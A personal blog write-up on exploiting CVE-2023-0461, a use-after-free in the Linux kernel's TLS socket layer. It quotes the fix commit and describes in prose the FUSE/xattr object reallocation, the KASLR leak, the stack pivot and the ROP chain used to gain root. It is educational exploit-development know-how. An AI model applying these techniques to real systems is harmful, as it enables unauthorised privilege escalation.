Exploiting a bug in the Linux kernel with Zig

At the tender young age of 36 I decided to write my first exploit. Because I have been writing Linux kernel tests and bug reproducers for years, it looked like a good idea to target the Linux kernel.

The Linux kernel is probably the hardest thing I can expect to exploit in a reasonable time. I know less about browser internals and other things which appear to enjoy the same level of competition.

The payoff here being insight into what it takes rather than a direct monetary reward.

I chose to exploit a bug that was previously used in Google’s kernelCTF. It’s not a trendy bug with a marketing team. It’s just known by the name CVE-2023-0461. I chose it because it was the first bug in Google’s spreadsheet.

I don’t like the idea of exploiting fake bugs or bugs in older kernels without most of today’s mitigations. However I didn’t want to target a bug that has never been exploited.

I wanted to know for certain that overall exploitation was possible. Otherwise I could get discouraged and give up on a bug when actually I would learn an important lesson from pushing through.

Regardless of what I do next, I think it was well worth the effort to get this working.

This isn’t a rigorous write-up on a new technique or a zero-day. It’s just my thoughts on the exploitation. Nonetheless it contains many technical details, a lot of which will be difficult to follow unless you are already very familiar with the subject matter.

I have created a video on the last part of the exploit covering the ROP chain. I had the intention of covering the other sections to, but when I started trying to step through those bits it got very disjointed and confused. I may come back to those, perhaps after I come up with a better solution for the heap spray. Perhpas not.

I’m really stretching the Zig theme here, but yes the exploit is written in Zig. It’s terrible Zig code, I made no effort to clean it up. However there is now a Linux kernel exploit written in Zig.

I would speculate that Zig is an attractive language for exploit writers. For precisely the same reasons its attractive for writing embedded and system code. However there is no evidence of that presented here.

Again it’s not like I am bitter or anything

Note that more usefully there is also an LTP test which reproduces the bug. The Linux Test Project has a number of such tests.

The bug

The bug is in the “User Level Protocol” (ULP for short) layer on top of TCP sockets. In theory all ULPs are vulnerable, but I only looked at TLS.

The Linux TLS module allows applications to offload some processing to the kernel or hardware. Once you have established a TCP connection and done the public key cryptography bit then the ULP allows you to offload the synchronous cryptographic stage to the kernel.

The bug was originally exploited (probably) by “D3v17 - savy@syst3mfailure.io”. They used it against the mitigation bypass target in Google’s kernelCTF. I’m looking at their exploit and write-up for the first time now and it is mostly a mystery to me.

The steps to reproduce the bug are the same, but that is where the similarities end. They didn’t resort to using FUSE and instead found a way to get their hands on those elastic objects, I keep hearing about.

We’ll come back to how annoyed I am at using FUSE later. For now lets look at my description of the bug which I wrote for the LTP test.

Reproducer for CVE-2023-0461 which is an exploitable use-after-free in a TLS socket. In fact it is exploitable in any User Level Protocol (ULP) which does not clone its context when accepting a connection.

Because it does not clone the context, the child socket which is created on accept has a pointer to the listening socket’s context. When the child is closed the parent’s context is freed while it still has a reference to it.

TLS can only be added to a socket which is connected. Not listening or disconnected, and a connected socket can not be set to listening. So we have to connect the socket, add TLS, then disconnect, then set it to listening.

To my knowledge, setting a socket from open to disconnected requires a trick; we have to “connect” to an unspecified address. This could explain why the bug was not found earlier.

The accepted fix was to disallow listening on sockets with a ULP set which does not have a clone function.

It took me a while of scanning the kernel code to find out that the connect system call can be used to disconnect a socket. I reviewed the locations where the socket state is updated and this appears to be the only place that meets the criteria.

This is written in the connect Linux man pages, but I wouldn’t have thought to look there because… you know, the name. I also must have seen this information before, but strangely enough my initial thought was that this bug is impossible because socket state transitions are one way.

For stream sockets at least this would match the BSD man pages. I find the POSIX page painful to read, but it doesn’t appear to address calling connect multiple times on a connection mode socket. It is left open to implementation.

Never think things do what their name suggests

This bug is probably a sin of omission, that is one where the software developer did not take into account some possible program state. If that is the case then I would also say that the semantic overloading of connect did not help.

Reproducing

I’m not sure how the bug was found, but I was starting with a CVE and fix commit with no reproducer. So the first step is to find a way of reliably reproducing the bug.

Below is the fix commit.

commit 2c02d41d71f90a5168391b6a5f2954112ba2307c
Author: Paolo Abeni <pabeni@redhat.com>
Date:   Tue Jan 3 12:19:17 2023 +0100

    net/ulp: prevent ULP without clone op from entering the LISTEN status

    When an ULP-enabled socket enters the LISTEN status, the listener ULP data
    pointer is copied inside the child/accepted sockets by sk_clone_lock().

    The relevant ULP can take care of de-duplicating the context pointer via
    the clone() operation, but only MPTCP and SMC implement such op.

    Other ULPs may end-up with a double-free at socket disposal time.

    We can't simply clear the ULP data at clone time, as TLS replaces the
    socket ops with custom ones assuming a valid TLS ULP context is
    available.

    Instead completely prevent clone-less ULP sockets from entering the
    LISTEN status.

    Fixes: 734942cc4ea6 ("tcp: ULP infrastructure")
    Reported-by: slipper <slipper.alive@gmail.com>
    Signed-off-by: Paolo Abeni <pabeni@redhat.com>
    Link: https://lore.kernel.org/r/4b80c3d1dbe3d0ab072f80450c202d9bc88b4b03.1672740602.git.pabeni@redhat.com
    Signed-off-by: Jakub Kicinski <kuba@kernel.org>

diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
index 848ffc3e0239..d1f837579398 100644
--- a/net/ipv4/inet_connection_sock.c
+++ b/net/ipv4/inet_connection_sock.c
@@ -1200,12 +1200,26 @@ void inet_csk_prepare_forced_close(struct sock *sk)
 }
 EXPORT_SYMBOL(inet_csk_prepare_forced_close);

+static int inet_ulp_can_listen(const struct sock *sk)
+{
+       const struct inet_connection_sock *icsk = inet_csk(sk);
+
+       if (icsk->icsk_ulp_ops && !icsk->icsk_ulp_ops->clone)
+               return -EINVAL;
+
+       return 0;
+}
+
 int inet_csk_listen_start(struct sock *sk)
 {
        struct inet_connection_sock *icsk = inet_csk(sk);
        struct inet_sock *inet = inet_sk(sk);
        int err;

+       err = inet_ulp_can_listen(sk);
+       if (unlikely(err))
+               return err;
+

and then the CVE description which was perhaps updated at some point. I will go with what’s in my notes.

There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege.

There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock. When CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener.

If a new socket is created from the listener, the context is inherited and vulnerable. The setsockopt TCP_ULP operation does not require any privilege.

So no hint at how one disconnects a TCP socket and actually we need more than that. We want to set the lower level socket state to SS_UNCONNECTED. Otherwise we can’t call listen. This is different from the TCP level connection.

Disconnecting a TCP socket can be done at least two other ways, you can close the other end or call shutdown. However that won’t set the socket state to SS_UNCONNECTED unless the connection was never fully established. That will just set the TCP state to TCP_CLOSE.

If the connection is never fully established then we can not set the ULP to TLS. So we need to fully establish the connection then reset both the socket and TCP states. Which, as I already mentioned, is done using connect with an address of AF_UNSPEC.

Once we know how to do it then it is relatively straight forward to reproduce. First we create a connection, calling setsockopt on the connected socket to add TLS to it. Then calling connect with AF_UNSPEC to set SS_UNCONNECTED and TLS_CLOSE on the socket. Finally we call listen and accept to accept an incoming connection and close that connection.

When that final connection is closed it will free tls_context while the listening socket still has a reference to it.

There are no race conditions and we could easily trigger the free multiple times once we have a listening socket with a tls_context. No instability comes from this part of the process.

Heap spray

At this point I knew that a use-after-free is useful for causing a type confusion. That is, the freed memory we still have a pointer to can be reallocated as a different type of object.

More than one type of object then shares the same memory. So that we can corrupt the memory from the POV of one or both of the objects.

The active Linux heap allocator (SLUB), uses various object caches. Some important objects get their own cache. Most however are allocated from general purpose caches of different sizes.

The tls_context object is allocated in the kmalloc-512 cache. There are multiple ways to find this out. Including looking at the size of the struct (328) and what flags it is allocated with GPF_KERNEL.

Also by adding slub_debug=T,*-512 to the kernel command line then doing the allocation we will see which 512 cache it is in. If we don’t know the size of the struct then debugging with gdb or tracing with kernel probes can show which cache is used.

Based on various writeups I had read (sorry I lost track of where I first saw some things), there are a number of objects, such as msg_msg and sk_buff, that can be allocated in any cache size and are mostly full of attacker controlled data.

So I started trying to heap spray these objects, however I didn’t appear to be getting any hits. Using some of the tracing methods mentioned above I realised that these objects were being allocated in kmalloc-cg-512, not kmalloc-512.

Looking at their allocations, they use GFP_KERNEL_ACCOUNT not GFP_KERNEL. On the face of it this flag has something to do with memory counters used in control groups. However it now also causes objects to be allocated in a different cache.

This is good for security because a lot of juicy variable length objects containing arbitrary user data are now segregated from everything else.

At this point I knew I could arbitrarily free any object in the kmalloc-512 cache. I wasn’t sure what to do with that though. I also know that cross cache attacks are possible, however I assumed it would be easier to find an object in the same cache. So I started looking for more objects I could use to replace msg_msg.

I became fixated with splice and writev. Firstly because I read about some ancient attack that hasn’t worked since the introduction of copy_to/from_user. I should have known better, but at least at this point I could see that my heap spray worked.

Secondly I moved onto bio_vec which is used when splicing between pipes. Because it can allocate an object in kmalloc-512 and then block. The problem is the object is a bio_vec array which contains pointers to struct page. These pages are mapped in just before use.

I didn’t have anything to pass as a pointer to a struct page at this point. I suppose that if I knew any valid page addresses (or pfn) then this could be used to read or write to it.

Finding a suitable object was by far not the only problem. To my knowledge the free is delayed by up to 5000 jiffies, which appears to be 5 seconds on the target kernel config.

This is because the context is freed with kfree_rcu which batches up frees. The maximum batch age is 5000 jiffies and on my quiet system I would often hit that. I suppose the time could be reduced by spamming frees, but then that could interfere with other things.

Throughout the exploit development I would accidentally introduce a change that put the wrong object into the freed slot. In one case I also moved the free and allocation to different processes and therefor different CPUs. Each CPU has its own free list, so this also stopped it from working. It was the main source of instability and confusion.

I have a couple of pages of notes and ideas from this stage. Plus there will be more stuff that I looked into, but didn’t bother to write down. This is the part of the exploit I would most like to revisit.

FUSE

What I did know at this point, was that there was a well proven heap spray technique using FUSE and extended file attributes. Originally it was done with userfaultfd.

Please do not nitpick, it is the sentiment that counts

I don’t like this technique because I think it can be easily mitigated like userfaultfd. It relies on the attacker having access to /dev/fuse and either fusermount or unprivileged user namespaces.

On a desktop it is quite likely that all users have access to /dev/fuse, but the only processes that need access to this are file system daemons. So there are obvious ways to shutdown this attack vector.

Having said that, it may not be convenient for desktops to restrict access to /dev/fuse. FUSE is extremely useful. So I don’t see it going away altogether. Unlike userfaultfd the absence of which has probably not bothered many people outside of data centers.

I have written two articles about FUSE already.

The second article is about using the raw FUSE interface which was partially motivated by this exploit.

I found that using the raw FUSE interface I don’t need to use the mmap page fault technique described in Chompie’s blog. Instead of mapping a file and blocking while reading from the file, I block on processing the xattr request itself.

I don’t know that I need to use the raw interface for this or that it is the better way to do it. However I wanted to poke at the raw interface and I poked it.

Needless to say it added a fair chunk of time onto the exploitation. Still, using FUSE at least, was the right thing to do because the probability it wouldn’t work was very low.

Using this method I don’t really do heap spray. I just allocate a single xattr after a delay. It usually gets the freed slot so long as the free and the alloc happen on the same CPU. This works on my very quiet VM, but I guess it would not fair so well with more noise.

One last note on FUSE is that there are a lot of FUSE message types and I would be surprised if the xattr messages are the only two of interest to attackers. FUSE gives user land the ability to pause inside a whole bunch of internal kernel operations.

KASLR

Now that I could overlap xattr buffers with tls_context I could read the content of tls_context. A caveat is that xattr zeros its buffer, also zeroing tls_context. This corrupts tls_context because after being initialised it contains a couple of pointers.

Luckily these pointers are not used much. Without touching them we are able to set the encryption keys used for transmitting or receiving using setsockopt. This writes lots of interesting things into tls_context.

One of these things is a function pointer to tls_sw_push_pending_record (or tls_device_push_pending_record if hardware with TLS offload is present). We can write this pointer into the xattr buffer while blocking the FUSE request. When setsockopt returns we can then allow the FUSE request to continue and read back the internal kernel pointer.

We need a function pointer because of address layout randomisation. If KASLR is enabled then the kernel shifts its address space by some amount. So that every symbol is offset from its default location.

If you can read then you can defeat KASLR

However the symbols are all still in the same order and there are no random gaps introduced between them. So if we retrieve a pointer to a known symbol, then we can calculate the location of any symbol.

RIP

The more sensitive reader may want to turn away now as things are going to get really ROPey.

At last I could read and write to tls_context. This doesn’t instantly grant root privileges though. The structure doesn’t contain a pointer to the process credentials. Plus it’s not obvious to me how to write to some arbitrary memory just using tls_context without hijacking kernel control flow.

Interestingly tls_context can contain an indirect reference to the creds via ctx->priv_ctx_rx->strp.sk->sk_socket->file->f_cred if we setup encryption for receiving data. I say interesting because any time we have a socket or sk pointer we know an arbitrary read would allow us to find the task creds.

I like the idea of a data only attack, however I didn’t see a clear path to getting arbitrary R/W. I expect it’s totally possible, especially by adding more object types to the type confusion.

With a data only attack I wouldn’t have to use a code reuse attack like ROP or JOP. This seemed attractive for a number of reasons, not least that ROP appeared magical, but also because the chain is specific to a particular kernel binary.

The fact is though that tls_context provides access to at least three function pointers which I can overwrite and execute. So that is three different places where I can try to launch my attack. I gather this is really good.

That isn’t to say it is easy though, as each location requires different setup to execute. We have to execute the function pointer without crashing the kernel before or afterwards.

Note that, back in the bad old days, I would have just been able to write some shell code (I don’t know why the word shell is there, it’s just code) into tls_context, then point one of the function pointers at it. This would then get executed like any other kernel code.

These days the heap memory where tls_context lives is not executable. So if we try that the CPU will refuse to execute it. We can set memory to be executable, but we need code execution to do it, so there is a chicken and egg issue there.

Hence if we want to take control of execution we have to reuse existing code. The code we want though is something like the following.

// resets credentials to root in the root user namespace
void escalate_privs(void) {
    return commit_kernel_creds(prepare_kernel_creds(NULL));
}

If you are writing a kernel, then don’t include a handy function like this. Indeed Linux does not include such code. This does not stop us though because of the way the jmp, call and ret CPU instructions work (for now).

The call instruction takes an address, any executable address, and updates rip to it after pushing the current value of rip to the stack. Meanwhile the ret instruction pops the top value off the stack into rip.

Updating rip changes the next instruction the CPU will execute. Presently there is nothing to stop us from passing an address to call which is not the start of a function.

Likewise ret will jump to whatever value is at the top of the stack. Furthermore we can change the location of the stack, including to heap memory that we control.

So each function has at least one ret instruction and we can jump to the instructions just before each ret to do whatever. The useful sequence of one or more instructions in front of each ret are called a gadget.

We can put the addresses of gadgets on the stack and the ret instructions at the end of each gadget will link them together. This forms a ROP chain, where ROP stands for Return Oriented Programming.

That’s not all though, because the various jmp instructions can also be used to set rip. There seem to be a variety of ways in which to construct a JOP gadget. In the end I just used ROP.

Note that finding ROP and JOP gadgets in general is easy because of the tooling available. Constructing them into a chain is more challenging, although I’m sure a constraint solver or similar could partially automate that as well.

I extracted the gadgets using the method described here. Then constructed the chain by grepping for suitable gadgets. Notably ChatGPT was useful for describing the purpose of basic x86 instructions and registers. It seems to have synthesized the various sources of x86 documentation well.

Initially I was not sure I could use a ROP chain. I knew I had to change the stack location rsp, but I wasn’t sure it would be allowed. This wasn’t an issue though; apparently no distinction is drawn between stack and heap locations.

Secondly I don’t have the address of tls_context, I have addresses to other memory locations within it, but not the structure itself. There is a pointer to a small amount of memory I control which is used to store some encryption gubbins, however it is too small for a ROP chain.

I noted though that if a register contains tls_context already then I can move that value into rsp using the first gadget. The first items in tls_context aren’t used for a lot of operations, so I can overwrite them with return addresses.

In the middle of tls_context there are some function pointers which we want to use to start the ROP chain. So we have to stack pivot over those. After that there is plenty of space to store a ROP chain.

The first place I tried to take rip control turned out to be a bad spot. Firstly it wanted to use the tls_context.sk_proto pointer which had been wiped when allocating xattr.

It only wanted one field in sk_proto, which turned out to be a function pointer. This wasn’t the function pointer I was originally targeting, but it was needed to reach the original, so I targeted it instead.

I couldn’t fake the whole sk_proto object because it is too large to fit in the memory I control. However only one field is accessed at a given offset. So I could fake that one field and put a pointer in ctx->sk_proto which is offset by the distance to the field.

This worked, but then I discovered that I had made a mistake. I thought that a pointer to tls_context would be in one of the registers at the call site which would start the ROP chain. It turns out that I was looking at a point in the execution just before the call site.

The register containing the context was cleared just before the call. So now I didn’t know where the location of my chain was. Instead of giving up on this path immediately I decided to try dereferencing the sk pointer which was in a register and the sk structure also contained a pointer to the context.

I would have to do this with JOP and didn’t grasp how to do that. I think it should be possible using a suitable JOP gadget that jumps to a location specified by a register I control. However I gave up and moved to another location to take RIP control.

This time I tried ctx->push_pending_record which can be called by setting ctx->pending_open_record_frags to true and sending a control message with sendmsg. This isn’t the only way to call it, but it appears to be the easiest.

I also got lucky because it has the context in the rax register and there is a ROP gadget which simply sets rax to rsp. Thus setting the stack to the context.

Not only that, but I discovered that cmsg allocates a variable sized object in GFP_KERNEL with only a small bit of header data. Potentially that is a replacement for xattr! Although I don’t know how a cmsg payload could be read back to user space.

Anyway I ignored that and managed to write a ROP chain that calls the necessary functions to set the creds. It’s only a very small amount of code, but it was not easy.

The biggest issue was restoring the stack pointer to its original value after elevating privileges. I can’t leave the stack pointing to the context if I want to gracefully return from push_pending_record and back to user land.

I couldn’t think of a way to save the rsp register, so that it could be restored later. I guess it’s possible with JOP, but I had already given up on that. It so happened though that 4 of the registers contained pointers to locations on the original stack.

It took a while, but I found a simple sequence of gadgets that calculated the original rsp value from rbx and restored it. After that I just had to do something with the newly gained privileges and that was it, the exploit was complete.

Writing a ROP chain is rather odd compared to writing plain assembly. The instructions which immediately appear before a ret are constrained by the x86 calling convention. It’s impossible to find mov with some pairs of registers for example. Even if you look at gadgets with multiple instructions, the compiler just doesn’t produce some things.

On the other hand it is surprising what it does produce. Although I guess ROPgadget looks at misaligned instructions as described in the book Practical Binary Analysis. So it’s not necessarily the case that the gadgets it finds are part of the kernel.

Shell

When the exploit successfully returns to user land, it just starts a shell. When the shell closes the kernel crashes because the tls_context is still corrupted and closing the socket causes some zeroed fields to be accesses. This can be fixed of course, it just requires more cleanup.

Because of the way I use FUSE the exploit requires unprivileged user namespaces to mount the FUSE FS. This is only because there is no fusermount in my image and my raw FUSE implementation doesn’t implement something needed to use fusermount anyway. Again this could be fixed, but I’d be more interested in switching away from FUSE.